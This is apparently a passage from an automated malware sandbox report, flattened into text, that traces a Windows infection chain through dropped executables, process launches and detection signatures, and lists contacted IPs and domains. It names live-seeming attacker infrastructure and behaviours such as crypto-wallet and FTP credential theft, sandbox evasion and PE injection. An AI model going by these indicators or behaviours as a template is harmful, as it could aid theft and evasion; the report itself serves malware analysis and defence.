49709, 49796, 49800 SELECTELRU Russian Federation 33->114 90 TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE, PE32 33->90 dropped 162 Found many strings related to Crypto-Wallets (likely being stolen) 33->162 164 Powershell drops PE file 33->164 46 TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE 4 33->46         started        50 conhost.exe 33->50         started        166 Contains functionality to start a terminal service 42->166 168 Hides threads from debuggers 42->168 170 Tries to detect sandboxes / dynamic malware analysis system (registry check) 42->170 172 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 42->172 file12 signatures13 process14 file15 110 C:\Users\user\AppData\Local\...\rapes.exe, PE32 46->110 dropped 204 Antivirus detection for dropped file 46->204 206 Multi AV Scanner detection for dropped file 46->206 208 Detected unpacking (changes PE section rights) 46->208 210 6 other signatures 46->210 52 rapes.exe 46->52         started        signatures16 process17 dnsIp18 122 176.113.115.6, 49715, 49722, 49723 SELECTELRU Russian Federation 52->122 94 C:\Users\user\AppData\Local\...\PfOHmro.exe, PE32 52->94 dropped 96 C:\Users\user\AppData\Local\...\mAtJWNv.exe, PE32 52->96 dropped 98 C:\Users\user\AppData\Local\...\CgmaT61.exe, PE32 52->98 dropped 100 13 other malicious files 52->100 dropped 174 Contains functionality to start a terminal service 52->174 176 Hides threads from debuggers 52->176 178 Tries to detect sandboxes / dynamic malware analysis system (registry check) 52->178 180 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 52->180 57 V0Bt74c.exe 52->57         started        60 ReK7Ewx.exe 52->60         started        file19 signatures20 process21 signatures22 182 Antivirus detection for dropped file 57->182 184 Multi AV Scanner detection for dropped file 57->184 186 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 57->186 188 Injects a PE file into a foreign processes 57->188 62 V0Bt74c.exe 57->62         started        66 V0Bt74c.exe 57->66         started        68 WerFault.exe 57->68         started        70 cmd.exe 60->70         started        process23 dnsIp24 126 garagedrootz.top 104.21.16.1, 443, 49809, 49814 CLOUDFLARENETUS United States 62->126 128 begindecafer.world 188.114.97.3, 443, 49801, 49805 CLOUDFLARENETUS European Union 62->128 212 Query firmware table information (likely to detect VMs) 62->212 214 Found many strings related to Crypto-Wallets (likely being stolen) 62->214 216 Tries to harvest and steal ftp login credentials 62->216 218 2 other signatures 62->218 102 C:\Users\user\AppData\...\Occupation.com, PE32 70->102 dropped 73 Occupation.com 70->73         started        77 conhost.exe 70->77         started        79 expand.exe 70->79         started        81 10 other processes 70->81 file25 signatures26 process27 file28 104 C:\Users\user\AppData\Local\...\RegAsm.exe, PE32 73->104 dropped 106 C:\Users\user\AppData\...duGeniusX.com, PE32 73->106 dropped 108 C:\Users\user\AppData\Local\...duGeniusX.js, ASCII 73->108 dropped 198 Drops PE files with a suspicious file extension 73->198 200 Writes to foreign memory regions 73->200 202 Injects a PE file into a foreign processes 73->202 83 cmd.exe 73->83         started        86 cmd.exe 73->86         started        signatures29 process30 file31 92 C:\Users\user\AppData\...duGeniusX.url, MS 83->92 dropped 88 conhost.exe 86->88         started        process32

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.